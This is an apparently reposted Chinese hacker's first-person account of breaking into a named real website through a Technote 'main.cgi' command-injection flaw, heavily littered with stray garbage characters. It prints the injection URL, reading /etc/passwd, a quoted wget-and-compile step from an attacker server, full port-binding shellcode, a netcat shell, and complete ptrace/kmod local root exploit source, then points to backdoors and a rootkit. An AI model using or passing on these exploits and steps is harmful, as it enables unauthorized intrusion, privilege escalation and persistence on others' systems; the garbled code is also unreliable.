作者:cnbird
2 `) h: U& H$ I. X( B0 c5 \) Z大家好,我是cnbird,我又回来了,好长时间没有写文章了,今天手痒痒,
# K( y5 c! |3 _: t( Y6 w/ M1 Y! _# b所以就写了一篇,希望对与unix的初学者有帮助.欢迎大家和我讨论技术。MainpAge:http://cnbird.hackvip.cn
% I0 D$ C r6 l6 n( x# M) [最近在家研究perl和UNIX服务器的安装和应用,所以很长时间没有进行渗 透了,在学perl和UNIX的话就要傻了,什么也不会了,所以去各大黑客站点
& A, \; j8 h5 z5 N2 |: n; U转转吧,来到了www.nsfocus.net看看吧,有没有什么新的公告啊,Technote 'main.cgi'远程任意命令执行漏洞 这个漏洞引起了我的注意,大致看了看,
知道了这是一个可以远程执行命令的漏洞,下面把漏洞的信息公布一下,Technote是韩国的Technote公司开发的公告牌系统。
Technote的'main.cgi'没有充分过滤用户提交输入,远程攻击者可以利用这
3 }# _6 y8 X& j个漏洞以WEB进程权限在系统上执行任意命令。
; J1 F- G' D b3 B7 x& i; J& N由于不正确过滤'filename'参数,攻击者提交包含"|command"的数据作为参
6 a' q. O6 J" A- L- X; P- h数内容,可能以WEB进程权限在系统上执行任意命令。
给出利用方法
_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id">http://[target]/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|
. M2 r! f/ n7 J6 U5 V看了看利用方法觉得很简单,所以打算自己写一个perl的漏洞利用程序,
9 N9 V1 {/ d" ~) `: u& D! f8 @0 K7 f看了半天,终于完成了,自己perl新学的原因,所以写的比较简陋,还要自己
修改路径,很麻烦,我就不公布了,省的高手见笑。其实这个漏洞成功率还是
+ F# t$ n* y6 E' a. d很高的,基本上90%以上吧,对于咱们这些经常搞安全的应该说是一个好消息.
! p$ A9 [2 |; K^_^.
' c. a' {1 z5 b- ]. S% w好了开始咱们这次难得的入侵之旅吧,这篇文章看着很简单,其实融合我多年
的经验(其实就1-2年),首先要测试这个漏洞,先要找这样的论坛,
) [" a7 |! [; @* [/ B' W& A: vgoogle.com就是方便,一下子找到了一大堆,好了随便挑一个进行测试吧,哈哈哈就拿你开口吧。
http://www.sealia.com/cgi-bin/technote/main.cgi首先大致看了看,然后就开始吧,
" r. w1 \4 ?8 Z按照绿盟给出的公告测试一下,输入_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id">http://www.sealia.com/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt|id|
! p' }8 ^5 n c: `3 ~- Z结果如图1
" D& t' G0 ~9 s: U
大家看到结果了
S) ]6 D! [5 I' Vuid=99(nobody) gid=99(nobody) groups=99(nobody) 下面就开始利用我自己写的程序来完成工作了,毕竟在IE里面输太麻烦了,4 B0 Z. C/ \! a5 z 我程序的工作1 x& X8 e7 [4 G; u* u/ \ 界面。如图2
! g" }. U- C4 N+ N7 |
依次输入IP和端口,就可以直接运行程序了,输入id呵呵,和IE里面基本上差
不多,
如图3

呵呵到这里我想大家的思路就是上传一个webshell然后在webshell里面搞了,
其实我也有这样的想法,可是我已经习惯了UNIX的命令行模式了,虽然能写一个webshell,但是我并没有这样做,我的目的是拿到root权限,大家一定问了,你连主机都没有连上呢,你怎么拿到root啊,小伙子你问的不错,奖你个梨吃,呵呵,下面我的思路就是登陆到机器上面,上面大家已经看到了,我们id命令的输出是uid=99(nobody) gid=99(nobody) groups=99(nobody),权限还是很低的,试试能不能拿到/etc/passwd然后跑密码,然后执行[www.sealia.com]$ cat /etc/passwd
5 S' y( ?# V- i9 \) Q% }) g, M不错,能拿到/etc/passwd。
9 u/ z) F x8 N/ ^" w* G( g) ^如图4
! M7 p" o4 s h" J% y( ^
呵呵已经得到/etc/passwd了,我们用流光去跑密码吧,当然我没有指望它能跑出来,等待的时间真漫长啊,无聊,都已经5点50分了,天天晚上,哦哦不是晚上了,是早晨这个时候睡觉,然后12点起来,天天如此,哎,,苦啊。。。
去forum.zone-h.org看看帖子吧,也许能找到什么灵感呢!无意间来到了http://forum.zone-h.org/viewtopic.php?t=1168&highlight=phpbb他们正在讨论phpbb的漏洞利用方法和代码,看看吧,虽然已经很老很老了,呵呵其实说实话,不怕各位见小,我以前问在这里问过问题,很长时间没有来了,看看他们有没有给回复啊
如图5
4 p. W; _. C& [+ ~7 [
呵呵见笑了,真没想到他们给的答案还很全面,^_^连什么程序都给出了,老外就是实在...呵呵...
This one works fine
. U% |8 P; W& u2 P8 Qhttp://rst.void.ru/download/r57phpbb2010.txt
upload, someth like this
: V2 I' L: s! G) S; t7 E./exploit.pl victimhost:port /php_root/ topic_num "wget -O /var/tmp/.r.c http://myhttpserver:port/exploit/root.c"
N6 K( k" y& ]; M$ Y* Q/ ?0 B+ {9 |0 _/ t: o ./exploit.pl victimhost:port /php_root/ topic_num "gcc /var/tmp/.r.c -o .root"
3 z$ r. c. j% fexec on victim hots same shit
5 K* O6 I4 V3 \( Iand binding shell
http://shellcode.org/Shellcode/Linux/shell-bind-shell.html
" S& Z. r, F9 ^& O回答的让我很满意啊,正好就试试他们给的方法吧,其实以前我也知道这样的方法的就是没有binding shell(就是把/bin/sh绑定到端口上)。好了说了这么多离题的话,我们还是赶紧做我们的事吧.
0 O7 [ L/ F( b首先来到了http://shellcode.org/Shellcode/Linux/shell-bind-shell.html看了看,
This piece of code will open a socket for listening upon port 20000 and spawn a shell for all incoming connections.
This would be ideal for a system which you didn't have a direct login shell upon.
从描述上来看是linux的binding shell,并且绑定到了20000端口,下面有该程序的下载地方,真方便啊,http://shellcode.org/Shellcode/Linux/shell-bind-shell.c
给出代码
1 h: p% d/ n P0 G# V% N3 e/* 92 bytes iscntrl() evading portbinding shellcode - linux-x86& Q8 ] g- }- ]) ?0 ` * - by bighawk (bighawk@warfare.com)9 o$ f* h' f* C+ S; ]0 N( [* O; i *( S4 t% P$ a7 z& w$ x: e0 v * This shellcode binds a shell on port 20000 *; h: Y5 p9 e4 b* {6 ?( i- n. ~ * stdin, stdout and stderr are dupped. accept() arguments are sane. */
3 @0 G" Z) S: E* @9 l) Uchar code[] =
"\x31\xdb" // xor ebx, ebx "\xf7\xe3" // mul ebx: }1 J \) h+ N X/ \+ g "\xb0\x66" // mov al, 102 "\x53" // push ebx' F0 v5 k6 c1 `7 o) g "\x43" // inc ebx* u, \) U; |1 `, d "\x53" // push ebx4 N, i& ~6 q8 U- G. Z "\x43" // inc ebx9 s* I- `# W- O "\x53" // push ebx+ O8 C; ^ Q5 f* ~ "\x89\xe1" // mov ecx, esp "\x4b" // dec ebx: O* Z; x/ x% m% B8 F "\xcd\x80" // int 80h "\x89\xc7" // mov edi, eax8 @* M* z, ], F5 m! _ "\x52" // push edx' ]: v& f* q& m4 U3 D; R "\x66\x68\x4e\x20" // push word 8270 "\x43" // inc ebx+ S5 E* ]6 \, D$ Q0 @ "\x66\x53" // push bx8 ~9 k* F& G/ p "\x89\xe1" // mov ecx, esp "\xb0\xef" // mov al, 239( r8 G" t- @( B# L" m: F "\xf6\xd0" // not al# \8 i+ J* e+ l- E6 U8 e "\x50" // push eax& D7 C" w5 }2 s! C! G0 n2 O "\x51" // push ecx# ]/ D0 C- r) z' `8 S; Z "\x57" // push edi' i: V2 b1 ~# J. k: j "\x89\xe1" // mov ecx, esp% e/ E/ T7 X4 M/ _ "\xb0\x66" // mov al, 102* W* _5 h& w( f( X2 { H "\xcd\x80" // int 80h "\xb0\x66" // mov al, 102 "\x43" // inc ebx4 p) L* X0 n- T# f) C "\x43" // inc ebx; }) N5 Z; X8 Y3 _ "\xcd\x80" // int 80h "\x50" // push eax "\x50" // push eax "\x57" // push edi- {! M, b# T& a) |" K& m/ ~ "\x89\xe1" // mov ecx, esp "\x43" // inc ebx' w# G* w8 I2 Q5 @; q: t8 f1 F "\xb0\x66" // mov al, 102* {# [; ^7 R- Z! V D1 l4 i "\xcd\x80" // int 80h "\x89\xd9" // mov ecx, ebx. g- g) V5 t1 B8 R; [! W$ H "\x89\xc3" // mov ebx, eax4 j; u2 `) ~7 P, T6 K "\xb0\x3f" // mov al, 63* Q, g4 s: t8 w% o) V6 j: C7 T "\x49" // dec ecx8 V9 j3 Z! v8 H "\xcd\x80" // int 80h "\x41" // inc ecx5 d& t3 e7 Z/ o0 F: c+ |1 J. b "\xe2\xf8" // loop lp( K7 \3 m6 ~7 d7 Q5 ?, C9 Y) y- k "\x51" // push ecx9 K2 X* m3 \1 s0 [1 B: k# s# A "\x68\x6e\x2f\x73\x68" // push dword 68732f6eh4 Z( n: ~8 j! E* |; {9 g4 K "\x68\x2f\x2f\x62\x69" // push dword 69622f2fh "\x89\xe3" // mov ebx, esp "\x51" // push ecx8 W! d7 R6 f6 b "\x53" // push ebx6 y4 U, U. W* p4 x4 k6 r* i7 n "\x89\xe1" // mov ecx, esp "\xb0\xf4" // mov al, 244 "\xf6\xd0" // not al: i# C; h4 J* Z "\xcd\x80"; // int 80h
( M0 E2 i$ n* c% z main() { void (*a)() = (void *)code; int i;% s" r- d& l( f$ J' P# | printf("size: %d bytes\n", strlen(code));( D& h+ S( l4 ?+ u* i# K. J printf("Testing for cntrl characters.. ");7 l, J& z3 e" Z- r* x for(i=0;i if(iscntrl(code)) printf("FAILED\n"), exit(255);( a3 \& N0 i2 m6 B! ?* Q printf("PASSED\n"); a();$ v+ C6 {/ O: r) {1 H } 好了我们已经知道该下载地址
然后ls /tmp得到下面的结果,[www.sealia.com]$ ls /tmpDate: Sat, 29 Jan 2005 22:17:14 GMTServer: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;Set-Cookie: koX8iT3Dda=-kleadata1-;Transfer-Encoding: chunkedContent-Type: text/plain
2bdlost+foundmremap_pte.cmysql.sockptrace.csess_0a3d59b6da83717a4c05fbc5c6429982sess_12981c19e4cdab7bc426af965e7c85desess_33c246570a69e0846eaaedaef61f0402sess_4eb43cb41a450e8a7d15998fe4e9ef82sess_5c2048e3188733f41bba9a1ab44a4f3bsess_6405a9b3e0a809d7f298ad598f5de180sess_67fc6892112d2d780a092664353dcbbasess_9e3a2581194c05f598543f10294a95edsess_a0332a716e5c0a0932331ce9a5ec64d2sess_a159ec1f21a671d5cfe201c384d8da1csess_c6f579b218f096eb5ba11fdbad90f248sess_cdea344ed2940c99c1fcc146c5322882sess_f1e8e705bb1a6c5197ab61a22442da90shell-bind-shell.cshell-bind-shell.c.1ssh-XX0CyKEcssh-XX7eRJNnssh-XX89utqmssh-XXEmor9Xssh-XXhC36Gwssh-XXpOcVIAssh-XXrhx8enssh-XXss6aKsssh-XXw2rzSs, ~ ~3 o' Y! h. z) k- U' I5 \
这个时候就说明已经成功了,现在我们查找一下gcc在哪里,别到时候闹了半天
在没有gcc就麻烦了,然后输入whereis -b gcc意思就是查找gcc的全路径输出结果
[www.sealia.com]$ whereis -b gccDate: Sat, 29 Jan 2005 22:21:06 GMTServer: Apache/1.3.29 (Unix) mod_throttle/3.1.2 PHP/4.3.8 PHP/3.0.18Set-Cookie: sealiakleadata1=|||1|; expires=Sunday, 31-Dec-01 23:59:59 GMT;Set-Cookie: koX8iT3Dda=-kleadata1-;Transfer-Encoding: chunkedContent-Type: text/plain* Z7 _/ d+ f' Q5 I6 G
12gcc: /usr/bin/gcc% `* k' g5 \" Z7 ?3 \9 ?; Y
好了找到gcc了,接下来的事就好办了,编译源程序gcc shell-bind-shell.c -o bind
编译成功在/tmp目录下多了一个我们编译的bind程序,下面我们就来执行它吧, h! V! R- Z `. T- D
/tmp/bind程序执行的很慢哦.....大概等了1-2分钟程序执行完成,根据程序的介绍我 ^" W5 W; [/ D x3 ]
们知道他开了20000端口,我们telnet 上去吧,telnet www.sealia.com 20000
哈哈连接上了这个时候摸瞎输入id;uname -a 我晕怎么出现"command not found"
呢,我晕了,没错啊,看看源程序吧,找到了最后,哈哈知道了原因,' i' \1 @) q3 z" Z7 p1 q @' z5 w
Note: To use this you will need to make sure that you append '\n\0' to your entered strings, otherwise you will receive errors saying "command not found".The following is a simple means of doing that: perl -e '$|++;while (<>) { print . "\n\x00"; }' | nc hostname 20000
(nc is netcat).好了知道为什么了,我们就换nc提交吧,执行nc -vv www.sealia.com 20000然后出现了C:\WINDOWS\system32>nc -vv www.sealia.com 20000Warning: inverse host lookup failed for 61.100.181.12: h_errno 11004: NO_DATAwww.sealia.com [61.100.181.12] 20000 (?) open在黑暗中输入id输出结果uid=99(nobody) gid=99(nobody) groups=99(nobody)如图7

呵呵到这里我们可爱的流光还在跑呢,跑了将近半个小时了,不等了,关闭它,太浪费资源了,这个时候我大概知道他是一个linux的操作系统,但不知道内核版本输入uname -r 可以看到这个linux的内核iduid=99(nobody) gid=99(nobody) groups=99(nobody)uname -r2.4.20-31.92.4.20的,下面咱们来提升权限吧,就是拿到root,这里说明一下这里有2个很好用的漏洞利用程序,一个是Linux Kernel do_mremap VMA本地权限提升漏洞(漏洞利用程序下载地址_pte.c">http://rhea.oamk.fi/~pyanil00/temp/mremap_pte.c)和Linux kernel 2.2.x - 2.4.x ptrace/kmod local root exploit好了都准备好了,咱们开始提升权限吧,大家先把咱们要利用的程序输入到linux里面cd /tmp;cat >1.c然后复制代码右键输入代码/*5 c x- k' W- K, q * Linux kernel ptrace/kmod local root exploit5 {% [: q9 _& A7 x6 N *+ D5 L$ b) s" k) [1 z& o9 U * This code exploits a race condition in kernel/kmod.c, which creates4 a! K# T Y- P$ F j * kernel thread in insecure manner. This bug allows to ptrace cloned * process, allowing to take control over privileged modprobe binary. m6 ]0 h v4 C) \5 m * * Should work under all current 2.2.x and 2.4.x kernels.9 U7 [/ a" u: O% d7 c, ]' U * 0 d2 m2 N( Z: G4 e0 m * I discovered this stupid bug independently on January 25, 2003, that * is (almost) two month before it was fixed and published by Red Hat * and others. * * Wojciech Purczynski <cliph@isec.pl>( c+ Z" `1 n. Q3 ]6 ~7 b0 E * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*% _5 R+ S& H" x, t$ a8 @ * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY * * (c) 2003 Copyright by iSEC Security Research/ w+ t# {" Q5 o* _" o) y8 [ */
#include " [/ W* z- v5 m, f8 L #include #include #include + @0 @" F: j" o4 V, h #include 4 m$ W0 {/ T. c+ e( ~! {. u* w #include ) I7 I* ^9 X: F7 {4 C0 f/ \ #include # j6 a9 m8 \ `7 i- |( b' [6 F- e #include #include 2 U T4 l, A9 x6 j) l- F #include #include ( L3 N* O; V# ?2 X #include #include #include - l. Y; b; e4 c5 x c5 ]/ h& b #include #include
char cliphcode[] =/ K8 W, ]! m$ ?" _6 r "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"7 w' ^ K/ p9 g' B; c# F* p "\x00\x5b\x31\xc9\x89\xca\xcd\x80" "\xb8\x0f\x00\x00\x00\xb9\xed\x0d". d# f6 @, w, z" F" d' D "\x00\x00\xcd\x80\x89\xd0\x89\xd3" "\x40\xcd\x80\xe8\xdc\xff\xff\xff";
#define CODE_SIZE (sizeof(cliphcode) - 1)
pid_t parent = 1;% W2 i. M: @( @* K' e9 Q% Q pid_t child = 1; pid_t victim = 1;* _4 X1 [$ x/ l2 B. n: m# z6 f volatile int gotchild = 0;
void fatal(char * msg)% S& x) E- m" q1 I' H { perror(msg);) J9 Z/ S7 x/ q& x kill(parent, SIGKILL); kill(child, SIGKILL);0 |+ ]3 O2 \( o$ d' R& G( k0 E! M kill(victim, SIGKILL); }
void putcode(unsigned long * dst)4 ^, \- S, U J { R9 Y7 Y+ e6 S) _* c! Q. Y: D char buf[MAXPATHLEN + CODE_SIZE];# x' M- |' W! V2 Y% h unsigned long * src; int i, len;
memcpy(buf, cliphcode, CODE_SIZE); len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);* s9 o. [- ^& \' v, O- A' L if (len == -1)8 F3 x4 I' y+ l fatal("[-] Unable to read /proc/self/exe");
len += CODE_SIZE + 1;) R' Q; R! `( J- C buf[len] = '\0';
src = (unsigned long*) buf;7 n f0 x; j( {# B for (i = 0; i < len; i += 4) if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1): o: n! s! L2 x3 c- ~" D2 ` fatal("[-] Unable to write shellcode"); }
void sigchld(int signo) {; R! ] J% U, g! n0 q struct user_regs_struct regs;
if (gotchild++ == 0)- I% L" C/ E; {7 V& y2 a; O return;
fprintf(stderr, "[+] Signal caught\n");
if (ptrace(PTRACE_GETREGS, victim, NULL, 畇) == -1)( H! l% k- a. K6 v/ \" x4 K; X fatal("[-] Unable to read registers");
fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);
putcode((unsigned long *)regs.eip);
fprintf(stderr, "[+] Now wait for suid shell...\n");
if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1) fatal("[-] Unable to detach from victim");
exit(0); }
void sigalrm(int signo) { errno = ECANCELED;3 a. L( ^4 }2 I. |' U% | fatal("[-] Fatal error");% U& M+ U: H, E$ O }
void do_child(void)8 n( e. l: Y e {1 x8 ?2 K+ e% O8 O8 F int err;
child = getpid(); victim = child + 1;
signal(SIGCHLD, sigchld);
do4 k/ w+ `2 F- `) o( x err = ptrace(PTRACE_ATTACH, victim, 0, 0); while (err == -1 && errno == ESRCH);
if (err == -1) fatal("[-] Unable to attach");
fprintf(stderr, "[+] Attached to %d\n", victim);& @6 ]- [- A5 b y0 ^% H+ i while (!gotchild) ; if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1). i; \# S. f2 g9 C7 ]- Q fatal("[-] Unable to setup syscall trace"); fprintf(stderr, "[+] Waiting for signal\n");
for(;;);& Y' j! X( F# |1 h }
void do_parent(char * progname) {* H( l. m$ G8 j struct stat st; int err;# L% n. a" W: A& P errno = 0; socket(AF_SECURITY, SOCK_STREAM, 1); do {( B3 l) D0 Z0 s& T: Z err = stat(progname, &st); } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);
if (err == -1) fatal("[-] Unable to stat myself");
alarm(0);- o$ B; M+ j, ~. X system(progname); }
void prepare(void)7 T f' r. L ^* a& l; R& B7 E {$ p* o }$ f7 B+ G7 l2 {0 A2 f+ C* H* j+ U if (geteuid() == 0) {6 d' c- l2 V( Q; z initgroups("root", 0);8 Y1 T2 U1 M0 n( e0 p `/ C" ^ setgid(0); setuid(0);5 U7 I1 u0 y$ T8 y0 y4 i$ n execl(_PATH_BSHELL, _PATH_BSHELL, NULL);: \, y8 P- i) D# A5 ]; O% i fatal("[-] Unable to spawn shell"); }. O7 o; g; T7 b2 ~ }
int main(int argc, char ** argv) {1 G% F2 m0 ^1 ^! U* T prepare(); signal(SIGALRM, sigalrm);6 E, ]9 i- E2 o" Q4 E0 }% c0 F alarm(10);
parent = getpid(); child = fork(); victim = child + 1;
if (child == -1)+ k1 O( U9 [& g% x' w+ r fatal("[-] Unable to fork");
if (child == 0) do_child();. M7 G5 S2 z( M5 u; M3 @. e1 | else Q& C/ N; G9 h/ E% f$ M" H do_parent(argv[0]);
return 0; }CRTL+C保存,然后编译gcc 1.c -o 1编译成功,然后输入./1程序开始执行了,-> Parent's PID is 2313. Child's PID is 2314.-> Attaching to 2315...-> Got the thread!!-> Waiting for the next signal...-> Injecting shellcode at 0x4000e85d-> Bind root shell on port 24876... =p-> Detached from modprobe thread.-> Committing suicide..... iduid=0(root) gid=0(root) groups=0(root)哈哈到这个时候我们已经是root了,剩下的工作就是安装后门了,大家可以参考我另外的一篇文章,more.asp?name=cnbird&id=522还有推荐一个不错的rootkitpacketstormsecurity.org/UNIX/penetration/rootkits/lrk5.src.tar.gz好了到这里所有的工作就算已经完成了,其实从入侵中我们可以看出来我们做网站的一定要重视web漏洞,这一点点的小漏洞就可以把能拿到系统的最高权限,可见其危害性,希望国内的网管能够重视起来.
| 欢迎光临 数学建模社区-数学中国 (http://www.madio.net/) | Powered by Discuz! X2.5 |